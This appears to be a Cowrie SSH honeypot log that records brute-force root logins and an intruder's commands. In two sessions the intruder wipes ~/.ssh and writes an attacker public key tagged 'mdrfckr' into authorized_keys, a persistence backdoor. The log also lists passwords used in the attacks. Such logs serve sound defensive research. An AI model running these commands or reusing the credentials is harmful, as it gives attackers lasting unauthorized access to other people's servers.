{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:11:13.032600Z","src_ip":"212.227.235.229","session":"a508f01dd945"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:11:14.040017Z","src_ip":"212.227.235.229","session":"a508f01dd945"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:11:14.282538Z","src_ip":"212.227.235.229","session":"013717cd42bb"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:11:14.283648Z","src_ip":"212.227.235.229","session":"a508f01dd945"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33592,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba97073487c6","protocol":"ssh","message":"New connection: 212.227.235.229:33592 (1.2.3.4:22) [session: ba97073487c6]","sensor":"my-vps","timestamp":"2025-08-26T13:11:44.817926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:11:44.818566Z","src_ip":"212.227.235.229","session":"ba97073487c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:11:45.064090Z","src_ip":"212.227.235.229","session":"ba97073487c6"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd@123","message":"login attempt [root/P@55w0rd@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:11:46.088321Z","src_ip":"212.227.235.229","session":"ba97073487c6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:11:46.599427Z","src_ip":"212.227.235.229","session":"ba97073487c6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:11:46.600137Z","src_ip":"212.227.235.229","session":"ba97073487c6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:11:46.600985Z","src_ip":"212.227.235.229","session":"ba97073487c6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:11:46.847194Z","src_ip":"212.227.235.229","session":"ba97073487c6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:11:47.441719Z","src_ip":"212.227.235.229","session":"ba97073487c6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:11:47.442393Z","src_ip":"212.227.235.229","session":"ba97073487c6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:11:47.689776Z","src_ip":"212.227.235.229","session":"ba97073487c6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:11:47.690588Z","src_ip":"212.227.235.229","session":"ba97073487c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33596,"dst_ip":"1.2.3.4","dst_port":22,"session":"376bb7ff34b9","protocol":"ssh","message":"New connection: 212.227.235.229:33596 (1.2.3.4:22) [session: 376bb7ff34b9]","sensor":"my-vps","timestamp":"2025-08-26T13:11:47.944231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:11:47.945101Z","src_ip":"212.227.235.229","session":"376bb7ff34b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:11:48.200488Z","src_ip":"212.227.235.229","session":"376bb7ff34b9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:11:49.265270Z","src_ip":"212.227.235.229","session":"376bb7ff34b9"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:11:50.524353Z","src_ip":"212.227.235.229","session":"376bb7ff34b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33600,"dst_ip":"1.2.3.4","dst_port":22,"session":"eddaba07f5e3","protocol":"ssh","message":"New connection: 212.227.235.229:33600 (1.2.3.4:22) [session: eddaba07f5e3]","sensor":"my-vps","timestamp":"2025-08-26T13:11:50.785040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:11:50.785809Z","src_ip":"212.227.235.229","session":"eddaba07f5e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:11:52.543846Z","src_ip":"212.227.235.229","session":"eddaba07f5e3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:11:53.305853Z","src_ip":"212.227.235.229","session":"eddaba07f5e3"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:11:53.554070Z","src_ip":"212.227.235.229","session":"ba97073487c6"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:11:53.561157Z","src_ip":"212.227.235.229","session":"eddaba07f5e3"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:08.856572Z","src_ip":"212.227.235.229","session":"459bc19c7669"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60182,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0eec6e1e57f","protocol":"ssh","message":"New connection: 212.227.235.229:60182 (1.2.3.4:22) [session: f0eec6e1e57f]","sensor":"my-vps","timestamp":"2025-08-26T13:12:17.510147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:12:17.510879Z","src_ip":"212.227.235.229","session":"f0eec6e1e57f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48720,"dst_ip":"1.2.3.4","dst_port":23,"session":"e359b8d73952","protocol":"telnet","message":"New connection: 212.227.125.160:48720 (1.2.3.4:23) [session: e359b8d73952]","sensor":"my-vps","timestamp":"2025-08-26T13:12:17.664794Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:12:17.751187Z","src_ip":"212.227.235.229","session":"f0eec6e1e57f"}
{"eventid":"cowrie.login.failed","username":"eos","password":"eos123","message":"login attempt [eos/eos123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:12:18.756939Z","src_ip":"212.227.235.229","session":"f0eec6e1e57f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:19.999648Z","src_ip":"212.227.235.229","session":"f0eec6e1e57f"}
{"eventid":"cowrie.session.closed","duration":13.650198459625244,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:31.314905Z","src_ip":"212.227.125.160","session":"e359b8d73952"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47302,"dst_ip":"1.2.3.4","dst_port":22,"session":"c06de8eaadbc","protocol":"ssh","message":"New connection: 212.227.235.229:47302 (1.2.3.4:22) [session: c06de8eaadbc]","sensor":"my-vps","timestamp":"2025-08-26T13:12:32.830741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:12:32.832391Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:12:33.090478Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.login.success","username":"root","password":"asd123!@#","message":"login attempt [root/asd123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:12:33.938320Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:34.384686Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:12:34.385341Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:12:34.386436Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:34.594510Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:12:35.124301Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:12:35.125163Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:12:35.336978Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:35.337852Z","src_ip":"212.227.235.229","session":"c06de8eaadbc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48855,"dst_ip":"1.2.3.4","dst_port":22,"session":"309a0d11f7c8","protocol":"ssh","message":"New connection: 212.227.235.229:48855 (1.2.3.4:22) [session: 309a0d11f7c8]","sensor":"my-vps","timestamp":"2025-08-26T13:12:35.553723Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:12:35.554520Z","src_ip":"212.227.235.229","session":"309a0d11f7c8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:12:35.769061Z","src_ip":"212.227.235.229","session":"309a0d11f7c8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:12:36.667347Z","src_ip":"212.227.235.229","session":"309a0d11f7c8"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:12:37.885361Z","src_ip":"212.227.235.229","session":"309a0d11f7c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50288,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b363f8056ca","protocol":"ssh","message":"New connection: 212.227.235.229:50288 (1.2.3.4:22) [session: 0b363f8056ca]","sensor":"my-vps","timestamp":"2025-08-26T13:12:38.117549Z"}
{"eventid":"cowrie.session.connect","src_ip":"187.107.88.97","src_port":56947,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9d309db90e2","protocol":"ssh","message":"New connection: 187.107.88.97:56947 (1.2.3.4:22) [session: a9d309db90e2]","sensor":"my-vps","timestamp":"2025-08-26T13:12:40.074239Z"}
